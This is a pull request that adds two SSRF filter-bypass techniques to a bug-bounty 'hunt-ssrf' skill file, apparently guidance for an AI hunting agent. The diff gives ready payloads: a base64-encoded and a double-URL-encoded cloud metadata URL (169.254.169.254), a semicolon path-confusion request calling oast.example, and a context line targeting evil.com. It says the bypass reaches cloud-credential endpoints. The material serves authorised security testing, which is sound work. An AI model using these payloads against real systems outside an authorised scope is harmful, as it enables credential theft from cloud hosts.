### PR TITLE
hunt-ssrf: two disclosed-report filter bypasses (evidence-driven body enrichment)

### DIFF
--- a/skills/hunt-ssrf/SKILL.md
+++ b/skills/hunt-ssrf/SKILL.md
@@ -388,6 +388,28 @@ http://Localhost/
 http://127.0.0.1%2F@evil.com/
 ```
 
+### App-layer input-encoding bypass (filter sees one thing, fetcher another)
+When the endpoint takes the target URL **wrapped/encoded** — a base64 blob in the path, a
+double-encoded param, a JSON-nested value — the front-end WAF/allowlist inspects the *raw*
+input while the backend **decodes it before fetching**. Encode the internal target so the
+filter never sees `169.254` / `localhost` in clear:
+```
+# target URL base64'd into a path segment the app decodes, then fetches
+GET /proxy/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8=/x.js   # = http://169.254.169.254/  (disclosed: reports/1189367)
+# double-URL-encode the host so one decode pass survives the filter
+url=http%253A%252F%252F169.254.169.254%252F
+```
+Always test whether the parameter is decoded once, twice, or base64'd before the fetch — the number of decode passes is the bug.
+
+### Path-normalization / semicolon bypass (front-end filter vs origin path)
+A front-end that blocks `url=` to internal hosts can be skipped when the origin re-normalizes
+path segments the edge left intact — inject `;/`, `/../`, or matrix-param segments so the edge
+routes it as benign but the origin resolves the SSRF fetch:
+```
+GET /;/;/resource/md/get/url?url=http://oast.example/   # edge ignores, origin fetches (disclosed: reports/2035332)
+```
+Full-read SSRF via this path-confusion reaches cloud-credential endpoints the direct `url=` param blocked.
+
 ### Schema/Protocol Bypasses
 ```
 # When only http/https allowed but implementation is loose


### PR DESCRIPTION
Evidence-driven capability enrichment. Pulled 433 content-verified disclosed-report summaries and systematically checked **13 concrete mechanics** (redirect_uri path traversal, postMessage token theft, HS256-with-RSA alg confusion, expired-JWT, GraphQL mutation CSRF, BOLA, invite-token-leak IDOR, ffmpeg RCE, dependency confusion, timeless timing, status-param tampering, +2 SSRF) against the flagship skill bodies.

**Result: 11/13 already in the bodies** — the skills already encode what real high-bounty bugs used. The 2 genuine gaps, both `hunt-ssrf`, are now added to the loaded body:
- app-layer input-encoding bypass (base64/double-encoded target the filter never sees decoded) — `reports/1189367`
- path-normalization / semicolon bypass (edge filter vs origin path resolution) — `reports/2035332`

Genericized; base64 payload decodes to link-local `169.254.169.254` only. All gates green.